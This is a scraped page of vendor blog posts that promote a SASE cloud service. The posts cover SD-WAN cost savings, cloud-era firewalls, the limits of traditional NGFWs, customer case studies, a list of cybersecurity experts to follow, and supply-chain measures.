Here there's a balance of considerations. Symmetrical Internet connections (also known as Dedicated Internet Access or DIA) offer guaranteed capacity, providing small savings relative to MPLS. Asymmetrical connections with best-effort capacity, such as xDSL or cable, can be aggregated together to match and exceed MPLS last mile uptime at a substantial discount compared to MPLS.
[boxlink link="https://www.catonetworks.com/resources/5-things-sase-covers-that-sd-wan-doesnt/?utm_medium=blog_top_cta&utm_campaign=things_sase_covers_sd-wan_doesnt"] 5 Things SASE Covers that SD-WAN Doesn’t | EBOOK [/boxlink]
Often, the ROI argument for SD-WAN is less about hard cost savings and more about optimizing network spending. Enterprises receive far more capacity and functionality for the same amount spent on MPLS. The cost per bit drops dramatically, enabling IT to equip locations with 5x to 10x more capacity. With SD-WAN able to aggregate and failover between multiple last-mile lines, uptime increases significantly
One example was Fischer & Co, an automotive company that reduced its connectivity costs by 70% by replacing MPLS with Internet last-mile and Cato SASE Cloud while relying on Cato SSE 360 for network security protection. Along with the cost savings, Fischer & Co gained the agility to respond to new business challenges instantly, adding new security services or opening new locations, all without the operational overhead of upgrading and scaling of branch security appliances.
SD-WAN ROI Driver #2: Reducing the Costs of Branch Security
SD-WAN also allows organizations to avoid the branch security costs of legacy networks. With legacy architectures, enterprises backhaul branch Internet traffic to a regional datacenter for security inspection and policy enforcement. This approach consumed precious MPLS capacity, increasing costs while adding latency that undermined the user experience. With SD-WAN, companies avoid consuming expensive MPLS capacity on Internet traffic. Instead, MPLS only carries critical application traffic, offloading bandwidth hungry and less critical applications to Internet connections.
However, this now requires branch security to inspect and enforce policies on the Internet flows. SD-WAN appliances include basic firewalls, but those firewalls lack the threat protection needed by today's enterprises. Branch firewalls offer more capabilities, but their capacity constraints limit inspection capabilities for CPU-intensive operations, such as SSL decryption, anti-malware, and IPS. As traffic grows or new capabilities are enabled, companies are often forced to upgrade their appliances. Cloud-based SSE solutions are more scalable but incur the operational cost of integrating and managing another point solution.
Network and network security convergence through a single-vendor SASE platform offers a way to tackle this tradeoff. Alewijnse, a Dutch manufacturing company, eliminated its MPLS network and applied enterprise-grade security to all traffic by switching to the Cato SASE Cloud, taking advantage of Cato’s full SSE 360 protection. "With Cato, we got the functionality of SD-WAN, a global backbone, and security service for our sites and mobile users, integrated together and at a fraction of the cost," said Willem-Jan Herckenrath, ICT Manager at Alewijnse.
UMHS, a healthcare company, eliminated its MPLS network and branch security firewalls by moving to Cato's converged, cloud-native and global SASE service. "UMHS is so satisfied with the decision to switch its firewalls to Cato that it plans to migrate all locations using MPLS as soon as their contracts expire. A cost analysis done by the organization shows that this change will save thousands of dollars by having all of its 13 locations connected to the Cato Cloud," said Leslie W. Cothren, IT director at UMHS.
SD-WAN ROI Driver #3: Network Automation and Co-managed Services
One of the costliest components of enterprise networking is the network management model. Legacy network management comes in two flavors: Do It Yourself (DIY) and a managed service. With DIY, network managers often use crude tools like Command Line Interfaces (CLIs) to manage router configurations. Since any network outage costs the business, networking teams focus on availability, evolving the network very slowly. Maintaining dynamic traffic routing or failover becomes very complex. To reduce this complexity, IT outsources network management to service providers, increasing costs and longer resolution times depending on the provider.
SD-WAN promises an improvement in network agility. DIY enterprises can automate network changes and increase network resiliency. However, SD-WAN does add "one more box to manage." For enterprises that prefer a managed service, a new co-managed model enables IT to make quick network changes through a self-service model while the service provider maintains the SD-WAN service. In a co-managed model, the customer doesn't have to maintain the underlying infrastructure and can focus instead on business-specific outcomes.
A case in point is Sun Rich, a food supplier with a North American network comprised of multiple MPLS providers, SD-WAN appliances, WAN optimization solutions, and network security devices – all managed by a small IT team. Every appliance came with its management platform, complicating troubleshooting. By switching to the Cato SASE Cloud, Sun Rich reduced costs and gained control over network and security changes through Cato's single, converged management application. "Based on our size, our annual renewals on our appliances alone were nearly Cato's price," says Adam Laing, Systems Administrator at Sun Rich. "Simplification also translates into better uptime. You can troubleshoot faster with one provider than five providers," he says.
But Is SD-WAN Enough? Comparing SD-WAN to SASE
SD-WAN offers significant opportunities to reduce costs and gain more "bang for the buck" compared to MPLS, but SD-WAN alone will be insufficient to address the needs of today's workforce. As such, an SD-WAN ROI evaluation must consider the myriad of additional point solutions needed to meet enterprise networking and security requirements.
The most obvious example, perhaps, is the hybrid workforce. SD-WAN only connects locations. Remote users will require additional services. Security requirements demand protection against malware, ransomware, and other network-based threats not provided by the rudimentary firewalls included in SD-WAN devices, forcing the deployment of third-party security solutions. Cloud-connectivity solutions are also required. Additionally, SD-WAN performance over the long haul is undermined by the unpredictability of the Internet core, requiring the subscription and integration of yet another solution – a global private backbone.
Separately, these individual solutions may be manageable, but together they significantly complicate troubleshooting and deployment. Deployment takes longer as each point solution must be deployed. Problems take longer to resolve as operations teams must jump between management interfaces to solve issues. In short, organizational agility is reduced at a time when agility is often the very reason for adopting SD-WAN.
How Does SASE Solve SD-WAN's Limitations: Read the eBook
SASE solves these challenges while reducing overall spending compared to MPLS alternatives, like SD-WAN. Cato SASE Cloud overcomes SD-WAN's limitations with built-in SSE 360, zero trust, cloud-native architecture with a complete range of security protections, including Secure Web Gateway (SWG), Cloud Access Security Broker (CASB), Data Loss Prevention (DLP), Zero Trust Network Access (ZTNA), and Firewall as a Service (FWaaS) with Advanced Threat Prevention (IPS and Next Generation Anti-Malware). Those capabilities operate from Cato's global platform, making them available anywhere while providing location and remote users with MPLS-like performance at a fraction of global MPLS costs. And with all components managed through a single interface, troubleshooting happens far faster than when juggling multiple interfaces. In short, SASE provides the promises of SD-WAN without its limitations, delivering considerable cost savings without comprising security, simplicity, or performance. For a more in-depth comparison of SASE vs SD-WAN, download our complimentary eBook, 5 Things That SASE covers that SD-WAN Does Not.
Today, nearly all companies have some form of cloud infrastructure, and 89% are operating multi-cloud deployments. In general, this trend seems to be continuing with...
September 15, 2022
Network Firewalls Are Still Vital in the Era of the Cloud Today, nearly all companies have some form of cloud infrastructure, and 89% are operating multi-cloud deployments. In general, this trend seems to be continuing with many companies planning to move additional assets to the cloud.
With the adoption of cloud infrastructure, organizations must reexamine their existing security infrastructures. Some security solutions are ill-suited to securing cloud environments, and the cloud introduces new security risks and challenges that must be managed as well. However, network firewalls are still a relevant and vital security solution in the era of the cloud.
Cloud Security Can Be Complex
Companies are moving to the cloud due to the various benefits that it provides. Cloud deployments increase the scalability and flexibility of IT infrastructure and are also better suited to supporting a distributed enterprise comprised of on-site and remote workers. Additionally, the cloud supports new methods of application development, such as a transition to serverless applications.
Another major selling point of the cloud is that customers can outsource responsibility for some of their infrastructure stacks to the service provider. Up to a certain layer, the service provider is wholly responsible for configuring, maintaining, and securing the leased infrastructure. However, this does not translate to a total handover of security responsibility. Under the cloud shared responsibility model, the cloud customer is responsible for managing and securing the portion of the infrastructure stack that they access and control.
Cloud deployments differ significantly from traditional, on-prem data centers. Many organizations struggle to effectively adapt their security models and architectures to support their new cloud environments, leading to widespread security misconfigurations and frequent cloud data breaches.
The interconnection between on-prem and cloud environments and between applications within cloud deployments makes network security vital to cloud security. Network firewalls are a crucial part of this, inspecting traffic flowing between different areas and limiting the risk of threats entering the corporate network or spreading within it.
[boxlink link="https://www.catonetworks.com/resources/why-remote-access-should-be-a-collaboration-between-network-security/?utm_medium=blog_top_cta&utm_campaign=network-and-security-wp"] Why remote access should be a collaboration between network & security | White Paper [/boxlink]
What to Look for in a Network Firewall
Many organizations already have network firewalls in place; however, a network firewall designed to secure the perimeter of the corporate LAN is ill-suited to protecting a distributed enterprise WAN. As companies move to the cloud, there are a number of core capabilities a network firewall should include:
Companies are growing increasingly distributed. In addition to traditional on-prem data centers, organizations are moving data storage and applications to cloud-based infrastructure, often as part of multi-cloud deployments. At the same time, employees are moving outside of the traditional network perimeter with the growth of remote and hybrid work, and the use of mobile devices for business.
As a result, network firewalls need to be able to provide protection wherever a device is located. Backhauling traffic to the corporate network for security inspection doesn’t work because it hurts network performance and increases load on on-prem IT infrastructure. Network firewalls must be as distributed as the rest of an organization’s IT assets.
Companies are increasingly dependent on Software as a Service (SaaS) applications to provide critical functionality to both on-prem and remote employees. Often, these SaaS applications are latency-sensitive, and poor network performance has a significant impact on corporate productivit
Network firewalls must offer strong performance to avoid creating tradeoffs between network performance and security. If network firewalls create latency due to inefficient routing or an inability to inspect traffic at line speed, they are more likely to be bypassed or otherwise undermined.
Corporate IT infrastructures are rapidly expanding as companies adopt cloud infrastructure, Internet of Things (IoT) devices, and mobile devices. As a result of this digital transformation, there are more devices, more applications, and more data flowing over corporate networks.
Network firewalls are responsible for inspecting and securing this network traffic, so they must scale with the network. As IT infrastructure takes advantage of the power of cloud scalability and IoT devices proliferate, network firewalls also need the scalability that the cloud provides.
Since corporate security architectures are growing increasingly complex, the variety of environments and endpoints that security analysts must secure can result in an array of standalone security solutions. This security sprawl is exacerbated by the evolution of the cyber threat landscape and the need to deploy defenses against new and emerging threats.
These complex and disconnected security architectures overwhelm security personnel and degrade a security team’s ability to rapidly identify and respond to threats. Standalone solutions require individual configuration and management, force context switching between dashboards when investigating an incident, and make security automation difficult or impossible.
A network firewall is the foundation of a corporate security architecture. To enforce consistent security policies and controls across all of an organization’s IT assets — including on-prem, cloud-based, and remote systems — companies need a network firewall that can operate effectively in all of these environments. Additionally, this firewall should be integrated with the rest of an organization’s security architecture to support rapid threat detection and response and enable security automation.
Simplifying Network Security with SASE
The transition to cloud-based infrastructure makes reconsidering and redesigning corporate security architecture critical. Cloud environments are more distributed and more exposed to potential threat actors than on-prem environments, and perimeter-based security models that worked in the past no longer apply when the perimeter is rapidly dissolving. While companies could attempt to build and integrate their own security architectures using various standalone solutions, a better approach is to adopt security designed for the modern corporate network.
Secure Access Service Edge (SASE) implements security with a network of cloud-based points of presence (PoPs) that meet all of the needs of the modern network firewall:
Location Agnostic: SASE PoPs are deployed as virtual appliances in the cloud. This allows them to be deployed anywhere, making them geographically convenient to devices located on-prem, remote, or in the cloud.Performance: Each SASE PoP converges a full security stack, so security inspection and policy enforcement can happen at once and anywhere. This eliminates the need to backhaul traffic for scanning.Scalability: SASE PoPs host cloud-native software that can leverage the scalability benefits of cloud infrastructure. A SASE Cloud can elastically scale vertically with more compute and throughput in a certain PoP, and horizontally with more PoPs in new geographical locations.Solution Convergence: SASE PoPs converge a range of network and security functions, including a next-generation firewall, intrusion prevention system (IPS), zero-trust network access (ZTNA), SD-WAN, and more. A solution built to converge these functions into a single platform can optimize and streamline their interactions to a degree that is impossible with standalone solutions.
Cato provides the world’s most robust single-vendor SASE platform, converging Cato SD-WAN and a cloud-native security service edge, Cato SSE 360, including ZTNA, SWG, CASB/DLP, and FWaaS into a global cloud service. With over 75 PoPs worldwide, Cato optimizes and secures application access for all users and locations, and is easily managed from a single pane of glass. Learn more about how Cato SASE Cloud can improve your organization’s cloud security by signing up for a demo today.
The modern business looks very different from that of even a few years ago. IT technologies have changed rapidly, and corporate networks are quickly becoming...
September 8, 2022
Why Traditional NGFWs Fail to Meet Today’s Business Needs The modern business looks very different from that of even a few years ago. IT technologies have changed rapidly, and corporate networks are quickly becoming more distributed and complex. While this brings business benefits, it also creates significant challenges.
One of the biggest hurdles that companies face is ensuring that the evolution of their IT infrastructure does not outpace that of their security infrastructure. Many companies have spent significant time and resources designing and implementing security architectures around traditional next-generation firewalls (NGFWs) and other security solutions. Attempting to make evolving IT infrastructure work with these existing security deployments is a losing battle, as these solutions were designed for networks that are rapidly becoming a thing of the past.
The Modern Enterprise is Expanding
In recent years, enterprise IT infrastructures have evolved, driven by the pandemic, shifting business needs, and the introduction of new IT and security technologies. Some of the most significant recent changes in corporate IT infrastructure include:
Nearly all companies have cloud-based infrastructure, and 89% have a multi-cloud deployment. This expansion into the cloud moves critical data and applications off-site and contributes to an increasingly distributed enterprise. Corporate WANs must be capable of efficiently and securely routing traffic between an organization’s various network segments.
The pandemic accelerated a transition to remote and hybrid work policies. With employees able to work from anywhere, corporate IT infrastructure must adapt to support them. Between remote work and the cloud, a growing percentage of corporate network traffic has no reason to pass through the headquarters network and its perimeter-based security solutions.
In addition to the growth in remote work, companies may also be expanding to new branch locations. Like remote workers, the employees at these sites need high-performance connectivity to corporate resources hosted both in on-prem data centers and in the cloud.
Mobile Device Usage
With the growth of remote work has also come greater usage of mobile devices — both corporate and personally owned — for business purposes. Devices that may not be owned or controlled by the company may have access to sensitive corporate data or IT resources, making access management and traffic inspection critical for corporate security.
Internet of Things (IoT) Devices
IoT devices have the potential to increase an organization’s operational efficiency and ability to make data-driven decisions. However, these devices also have notoriously poor security, posing a significant threat to the security of corporate networks where they are deployed. Corporate IT architectures must be capable of limiting the risk posed by these devices, regardless of where they are deployed within the corporate WAN.
With the evolution of corporate networks, traditional LAN-focused security models are no longer effective. While protecting the corporate LAN is important, a growing percentage of an organization’s employees and devices are located outside of the traditional network perimeter. Defending cloud-based assets and remote workers with perimeter-based defenses is inefficient and hurts network performance and corporate productivity. As enterprise networks expand and grow more distributed, security architectures must be designed to protect the corporate WAN wherever it is.
Appliance-Based NGFWs Have Significant Limitations
Traditionally, most organizations have implemented perimeter-based defenses using appliance-based security solutions. If most or all of an organization’s IT infrastructure and employees are located on-site, then appliance-based security solutions can effectively meet the needs of the enterprise.
However, this description no longer fits most companies’ IT environments, making the traditional perimeter-focused and appliance-based security model a poor fit for organizations’ security needs. Some of the main limitations of appliance-based security solutions such as next-generation firewalls (NGFWs) include:
NGFWs are designed to secure a protected network by inspecting and filtering traffic entering and leaving that network. To do so, they need to be deployed in line with all secured traffic flowing through them. This limits their effectiveness at securing the distributed enterprise as they must either be deployed at protected networks — which is increasingly unscalable with the growth of cloud deployments, remote work, and branch locations — or have all traffic rerouted to flow through them, which increases latency and harms network performance.
[boxlink link="https://catonetworks.easywebinar.live/registration-the-upside-down-world-of-networking-and-security?utm_medium=blog_top_cta&utm_campaign=upside_down_webinar"] The Upside-Down World of Networking & Security | Webinar [/boxlink]
An appliance-based NGFW is limited by its hardware and has a maximum volume and rate of traffic that it can inspect and secure. As companies increasingly adopt cloud-based infrastructure, this creates challenges as cloud resources can rapidly scale to meet increased demand. Scaling an appliance-based security solution may require acquiring and deploying additional hardware, an expensive and time-consuming process that limits corporate agility.
Complex Management and Maintenance
To be effective, security solutions such as NGFWs must be tuned to address the security concerns of their deployment environments. As companies expand to include cloud-based infrastructure, remote work, and branch locations, they may need to protect a wide range of environments. The resulting array of security solutions and custom configurations makes security management complex and unscalable.
Traditional NGFWs were designed for corporate IT environments where an organization’s assets could be protected behind a defined perimeter and used infrastructure under the organization’s control. As corporate networks evolve and these assumptions become invalid, traditional NGFWs and similar perimeter-focused and appliance-based security solutions no longer meet the needs of the modern enterprise.
Redesigning the NGFW for the Modern Business
Businesses’ digital transformation initiatives and efforts to remain competitive in a changing marketplace have driven them to adopt new technologies. Increasingly, corporate assets are hosted in the cloud, and IT architectures are distributed.
Attempting to use traditional security solutions to secure the modern enterprise forces companies to make tradeoffs between network performance and security. As IT architecture moves to the cloud and becomes distributed, NGFWs and other corporate cybersecurity solutions should follow suit.
The evolution of the corporate network has driven the development of Secure Access Service Edge (SASE) solutions, which overcome the traditional limitations of NGFWs and integrate other key network and security functions. These cloud-based solutions provide various benefits to the organization, including:
Global Reach: SASE cloud-native software is deployed in points of presence (PoPs) all over the world. This enables delivery of NGFW capabilities anywhere, minimizing the distance between on-prem, cloud-based, and remote devices and the nearest PoP.
Improved Visibility: With SASE, all traffic traveling over the corporate WAN passes through at least one SASE PoP. This enables security inspection and policy enforcement and provides comprehensive visibility into corporate network traffic.
Simplified Management: All SASE features are managed through a single pane of glass. This simplifies security monitoring and management, and enables unified and consistent enforcement.
Security Integration: SASE PoPs consolidate numerous security and network capabilities into one coherent service, enabling greater optimization than standalone solutions.
Scalable Security: SASE PoPs run cloud-native software. Scaling up to meet increasing demand happens elastically, without downtime, and without customer involvement. Enterprises no longer need to worry about mid-term hardware failure or refresh.
Performance Optimization: Delivering security next to the user and the application instead of carrying user and application traffic into a central security stack reduces network latency, and improves user experience and productivity.
Cato Networks built the world’s first cloud-native, single-vendor SASE. The Cato SASE Cloud Is available from a private cloud of 75+ PoPs connected by dedicated, SLA-backed private global backbone. See the capabilities of Cato SASE Cloud for yourself by signing up for a free demo today.
Cato has received much praise and many industry awards from analysts over the years, but it’s our customers who know us the best. So, it’s...
September 6, 2022
The Gnutti Carlo Group Names Cato Networks 2021 Best Supplier in the Innovation Category Cato has received much praise and many industry awards from analysts over the years, but it's our customers who know us the best. So, it's especially gratifying to receive an award from a customer -- the 2021 Best Supplier award in the Innovation Category from global manufacturer Gnutti Carlo Group. The award recognizes the high value of the WAN connectivity and security the Cato SASE Cloud delivers in support of the Gnutti Carlo Group's digital transformation initiative.
"Thanks to the Cato platform and together with strategic services, the Gnutti Carlo Group has benefitted from a more structured, controlled, and secure ICT landscape across the entire company," says Omar Moser, Group Chief Information Officer for the Gnutti Carlo Group. (You can read more about the award here and the Gnutti Carlo Group's story here.)
Too Much Complexity!
Based in Brescia, Italy, the Gnutti Carlo Group is a leading global auto component manufacturer and partner to several OEMs active in the auto, truck, earthmoving, motorcycle, marine, generator sets, and e-mobility sectors. With annual revenues of 700 million euros and nearly 4,000 employees, the company has 16 plants in nine countries in Europe, America, and Asia.
The Group came to Cato to reign in the complexity of its network and security infrastructure built over the years from numerous mergers and acquisitions. "“Since 2000, we have started with an intensive program of internationalization, performing various acquisitions of companies of our sector and even competitors, each with different network and security architectures and policy engines,” says Moser. "It was difficult to keep policies aligned and prevent back doors and other threats."
The company had several datacenters across its locations for local services and took advantage of Microsoft Office 365, Microsoft Azure, and hosted SAP cloud services. "We had it all: public cloud, private cloud, and on-premises applications," says Moser.
Most locations were connected with IPsec VPNs, except for China, which was reached from Frankfort via a shared MPLS.
Moser realized that the only way to serve the business effectively was to centralize security and interconnection control among all locations and between plants, suppliers, and the cloud.
[boxlink link="https://www.catonetworks.com/customers/the-gnutti-carlo-group-centralizes-wan-and-security-boosts-digital-transformation-with-cato/?utm_medium=top_cta&utm_campaign=gnutti_case_study"] The Gnutti Carlo Group Centralizes WAN and Security, Boosts Digital Transformation with Cato | Customer Success Story [/boxlink]
Cato Does it All
He looked at several SD-WAN and SASE solutions, but Cato SASE was the only one that could deliver on all his requirements. "The other solutions couldn't give us a single package with integrated security, networking, and remote access," says Moser. He liked other things about the Cato solution, including its large number of globally dispersed points of presence, SASE architecture, single network and security dashboard, and forward-looking roadmap. Less tangible pluses were his great relationship with Cato and its excellent response time whenever he had any questions.
Moser entered into a three-month conditional purchase contract with Cato, after which he could close the contract if it didn't meet expectations. He connected ten plants, two service providers, 650 remote access VPN users, and Microsoft Azure via Cato and deployed Cato's SSE 360 security services across them.
A Platform for Digital Transformation
The results were so positive that he nominated Cato for the Best Supplier award. Network performance was excellent, even in China, where Moser saw a noticeable latency improvement over MPLS. Security was much improved thanks to firewall policy centralization and optimization and the ability to monitor traffic and block risky services that were previously open. "Standardizing firewall policies and knowing I can prevent intrusions and malware has allowed me to sleep a lot better," says Moser.
Best of all, Cato has enhanced the group's business agility for its digital transformation. "It is my job to be proactive and efficient," says Moser. "If we need to open a new office we can do it easily. With Cato, we have standardization, an innovative approach, and a single partner we can grow with as we transform digitally,"
Satisfying and empowering our customers are Cato's ultimate goals, which is why awards like this one from the Gnutti Carlo Group are music to our ears.
Our list of experts encompasses professionals and leaders who, together, deliver an overarching understanding of the Cybersecurity industry and the evolving nature of security threats....
September 1, 2022
15 Cybersecurity Experts To Follow on LinkedIn Our list of experts encompasses professionals and leaders who, together, deliver an overarching understanding of the Cybersecurity industry and the evolving nature of security threats. By following them, you can gain deep insights into cybersecurity’s latest developments and trends, deepen your understanding of the hacker mindset and get a glimpse into future predictions. As global cybersecurity leaders who’ve seen the dark side, they have an interesting and unique perspectives that can provide value to anyone working or interested in cybersecurity. Read on to see who the top 15 cybersecurity experts are that we recommend following on Linkedin.
1. Brian Krebs
Brian is an investigative reporter and journalist who focuses his work on cybercrime and cybersecurity. He is the author of a daily blog that is hosted on his website KrebsOnSecurity.com. For 14 years, (2005 to 2019), Brian reported for The Washington Post. He also authored more than 1000 blog posts for the Security Fix blog.
The KrebsOnSecurity blog covers a wide variety of topics, from data breaches to security updates to human stories of cyber scams. They are all reported in an informative, yet personalized, manner; almost as if you were listening to a friend tell you a story. The busy comment section adds an inviting and interactive feeling.
2. Andy Greenberg
Andy Greenberg is a cybersecurity writer for the online media outlet, WIRED, and an author. Andy’s stories cover cybersecurity, privacy, hackers and information freedom. Some of his recent articles cover the war in Ukraine, how data and organizations are hacked to seize political control and recent cyber attacks. Andy has written two books. The first, Sandworm: A New Era of Cyberwar and the Hunt for the Kremlin's Most Dangerous Hackers, was published in 2019. The second, Tracers in the Dark: The Global Hunt for the Crime Lords of Cryptocurrency, will be released in November 2022.
3. Mikko Hypponen
The known security term "if it’s smart, it’s vulnerable” was coined by this security expert and influencer - Mikko Hypponen. Mikko is the Chief Research Officer at WithSecure and the Principal Research Advisor at F-Secure, as well as a researcher, keynote speaker, columnist and author. Mikko’s work covers global security trends and vulnerabilities, privacy and data breaches. Follow him to uncover data-driven analyses of what’s going on in privacy and security, accompanied by his take into what the future of cybersecurity holds.
4. Graham Cluley
Graham is a researcher, blogger, public speaker and podcaster. He talks about computer security threats and works with law enforcement agencies on hacker and cyber gang investigations. Graham’s daily blog, grahamcluley.com, focuses mainly on cyber attacks and scams. Reports are bite-sized and include concise explanations coupled with tips for readers. Graham also hosts the Smashing Security podcast, together with Carole Theriault.
[boxlink link="https://www.catonetworks.com/cybersecurity-masterclass/?utm_medium=top_cta&utm_campaign=masterclass_lobbypage"] Cybersecurity Master Class | Check it out [/boxlink]
5. Daniel Miessler
Head of Vulnerability Management and AppSec at Robinhood by day, security writer by night, Daniel creates and delivers security-related content on a regular basis via his website, danielmiessler.com. There, you can find blogs, tutorials and podcasts on information security, often combined with his philosophical and political views. The result is a wealth of candid information, depicting a refreshing and humanistic view of information security.
6. Ido Cohen (Darkfeed)
If you’re looking to stay up-to-date on all things ransomware, Ido’s Twitter page is one to follow. Through quick and concise updates, Ido provides all the necessary information about recent attacks, ransomware gangs, ransomware strains and threats. While you might not get in-depth analyses or intense research reports from Ido, you will stay in the know about news, so you can pick and choose what to dig deeper into on your own time.
7. Etay Maor
An industry-recognized cybersecurity speaker and a Business Insider “IBM Rockstar Employee”, we’re proud to call Etay one of our own, as Senior Director of Security Strategy at Cato Networks. Etay is an adjunct professor at Boston College, and is part of the Call for Paper (CFP) committees for the RSA Conference and QuBits Conference. In addition to following him on LinkedIn, Etay has a dedicated Cybersecurity Masterclass series, designed to teach professionals of all levels the best practices they need to protect their enterprise. Watch his Masterclass series on everything from identifying and mitigating deepfake threats, setting up threat hunting and threat intelligence programs, and more.
8. Kevin Mitnick
Convicted-hacker turned security consultant, Kevin is a valuable source of cybersecurity information, especially when it comes to social engineering and system penetration. Kevin now runs a security firm, speaks in the media at cybersecurity events and has authored a number of popular books. Follow him and his blog to (start to) understand the mindset of hackers.
9. Chuck Brooks
Chuck is a thought leader, speaker and writer for cybersecurity who boasts multiple accolades, like “Top Person To Follow on Tech by Linkedin” and “received Presidential Appointments for Executive Service by two US Presidents”. By following him on Linkedin you will be exposed to his articles and speaking occasions, as well as his commentary on current affairs.
10. Dan Lohrmann
Dan is a renowned cybersecurity speaker, author and blogger, as well as an advisor for government organizations. His blog covers technological trends and global changes from a bird's eye view, while his social channel provides a newsfeed which outlines recent attacks and events from a governmental and geo-political security perspective. Together, they provide a broad overview of cybersecurity needs for the public sector.
11. Magda Chelly
Dr. Magda Lilia Chelly is a cybersecurity leader, influencer and author who appears regularly in the media. She has authored three books and regularly leverages her public stance to promote social issues, like gender equality in the workplace or WLB. By following her, you’ll devour a broad range of cybersecurity topics, from remote work requirements to risk management to cybersecurity trends. Most of her thoughts and content are strategic, and can help any leader looking to design or improve their organizational security.
12. Rinki Sethi
Rinki is the CISO at bills.com and was formerly the CISO at Twitter and the Information Security VP at IBM and Palo Alto Networks. As a security leader, she not only builds and manages cybersecurity strategies, but she also shares her thoughts and knowledge. By following her social channels, you will get access to her curated list of cybersecurity resources as well as a peek into the professional and personal life of a CISO.
13. Tyler Cohen Wood
A recognized top cybersecurity influencer, Tyler is a co-founder of a cybersecurity product and a Talk Show host at My Connected Life, which discusses digital health. She is also an author, a writer and a public speaker. Tyler’s work focuses mainly on how to mitigate cyber threats in a digital world, from a unique perspective that combines both personal opinion and business requirements.
14. Bill Brenner
Bill is an infosec expert who researches, writes and builds communities. He’s also a VP at CyberRisk Alliance. On his social channels he shares the latest updates about vulnerabilities and security controls. What’s unique about him is that he has a down-to-earth approach to cybersecurity, by understanding that security’s job is not to scare, but to provide practical and feasible assistance to CISOs.
15. Richard Bejtlich
As a security strategist, former computer incident response team lead and martial arts student, Richard definitely knows about defense. In the past, he published a number of books as well as a blog. Today, we recommend following him on Twitter, where he shares his personal (and sometimes tongue-in-cheek commentary) on security-related current affairs.
Who Else Should We Follow?
Working in cybersecurity often feels like playing a never ending game of Whack-A-Mole. Cybersecurity experts, like those listed above, can help security experts shorten the path to determining what they should focus on strategically, which issues they should pay attention to and how to allocate their resources.Are there any other experts who help you prioritize what to work on? Share with us on Linkedin.
During an investor call in February 2022, Arista Network’s president and CEO Jayshree Ullal said that some of the lead times on its sales are...
IT Supply Chain Problems? Here’s How the Cloud Helps Get Around Them During an investor call in February 2022, Arista Network’s president and CEO Jayshree Ullal said that some of the lead times on its sales are 50-70 weeks out. Likewise, Cisco is facing extreme product delays. According to Cisco CFO Scott Heron, “The ongoing supply constraints not only impacted our ability to ship hardware, but also impacts our delivery of software such as subscriptions that customers order with the hardware. That undelivered software is also included in backlog until the hardware ships, which is when we begin to recognize the revenue.”
Arista and Cisco are not unique in their sales malaise. Gartner Principal Research Analyst Kanishka Chauhan reported the semiconductor shortage will severely disrupt the supply chain and will constrain the production of many electronic equipment types, including the networking industry.
All of which begs the question, why hasn’t Cato been impacted?
Being a cloud service obviously minimizes the effects of the log-jammed supply chain. Software keeps flowing as long as the developers keep coding. But Cato does have some hardware dependencies, most notably the Cato Socket, Cato’s edge SD-WAN device. And while the Socket is very “thin”, pushing most processing into Cato SASE PoPs, it’s still reliant on the components being impacted by today’s supply chain issues.
[boxlink link="https://www.catonetworks.com/resources/socket-short-demo/?utm_source=blog&utm_medium=top_cta&utm_campaign=cato_socket_demo"] From Legacy to SASE in under 2 minutes with Cato sockets | Watch Cato demo [/boxlink]
Immediate Action: Executive Buy-in is Critical to Addressing Supply Chain Problems
To address the problem, we protected ourselves by expanding our supply chain in a series of moves that required buy-in at the highest levels of Cato.
The first order of business was to understand what components in a Socket’s bill of materials (BOM) were at the highest risk of unavailability. The BOM is the list of materials and components required to construct a product, the Cato Socket in this case, and the specific directions needed for procuring and using the materials. In reviewing the BOM, we first identified any chipsets that had an expected delay of one year, which is highly problematic for any supplier.
Our solution was to help our Socket manufacturers source components from alternative component suppliers. Being a cloud service, Cato could be very flexible in the terms and conditions we gave to our manufacturers, enabling them to source components from suppliers with whom normally they might not have been able to negotiate profitable terms. (All suppliers are trusted and certified to ensure quality standards are met.)
The second action we took was in logistics. We changed how we transported goods from the manufacturer in Taiwan to strategic distribution centers around the world. Like most vendors, we normally ship components by sea, which is the most economical approach, but also takes the most time. Instead, we began shipping products by air, eliminating the lengthy sea travel time and long delays at backed-up seaports.
Long Term Action: Increasing Component Supplies Prevents Impact of Forecasted Shortages
Recognizing that there’s no quick fix to the component shortage, we took steps to manage the situation over the long term. We decided to increase our production orders with our manufacturer to cover forecasts at least through the next two years. By making this early commitment, the manufacturer could plan for the necessary components and begin stocking them now. We also communicate regularly with the manufacturer to monitor problem areas in acquiring components.
Next, Cato is considering having our Socket manufacturer build “problematic kits” of the major at-risk components. A kit consists of the Socket components with the longest lead times. Cato is willing to commit to purchasing thousands of kits to have on hand. A kit is a fraction of the cost of a complete Socket since it’s just a bunch of parts. It’s worth acquiring these components and stockpiling them as they become available to reduce the lead time of buying them when they are needed. Once again, this increases our agility and reduces our long-term risk.
To better prepare for the future, Cato is testing alternative components to the parts of the current Socket that are problematic to source. A replacement part may have the same delivery issues but it’s still worth having options to give us flexibility. If we choose alternative components, they will be certified by both the manufacturer and Cato to ensure they meet our performance standards.
In addition, Cato continually evaluates new manufacturers for multisourcing Socket production. By not relying on any one platform or company, Cato ensures a continuous flow of products.
The Cloud: Cato’s Key Advantage in Weathering the Supply Chain Dilemmas
Being a cloud-first company affords Cato great flexibility in weathering supply chain shortages and disruptions. Through some planning and a bit of ingenuity, we’ve been able to ensure continued component and product availability for the foreseeable future.
I love Trombones… in marching bands. Some trombones, however, generate a totally different sound: sighs of angst across networking teams around the world. Why “The...
The Sound of the Trombone I love Trombones… in marching bands. Some trombones, however, generate a totally different sound: sighs of angst across networking teams around the world.
Why “The Trombone Effect” Is So Detrimental to IT Teams and End Users
The “Trombone Effect” occurs in a network architecture that forces a distributed organization to use a single secure exit point to the Internet. Simply put, network traffic from remote locations and mobile users is being backhauled to the corporate datacenter where it exits to the Internet through the corporate’s security appliances stack. Network responses then flow back through the same stack and travel from the data center to the remote user.
This twisted path, resembling the bent pipes of a trombone, has a negative impact on latency and therefore on the user experience. Why does this compromise exist? If you are in a remote office, your organization may not be able to afford a stack of security appliances (firewall, secure web gateway or SWG, etc.) in your office. Affordability is not just a matter of money. Distributed appliances have policies that need to be managed and if the appliance fails or requires maintenance – someone has to take care of it at that remote location. Mobile users are left unprotected because they are not “behind” the corporate network security stack.
[boxlink link="https://www.catonetworks.com/resources/cato-sse-360-finally-sse-with-total-visibility-and-control/?utm_source=blog&amp;utm_medium=top_cta&amp;utm_campaign=cato_sse_360"] Cato SSE 360: Finally, SSE with Total Visibility and Control | Whitepaper [/boxlink]
Do Regional Hubs Mitigate the Impact of “Trombone Effect?”
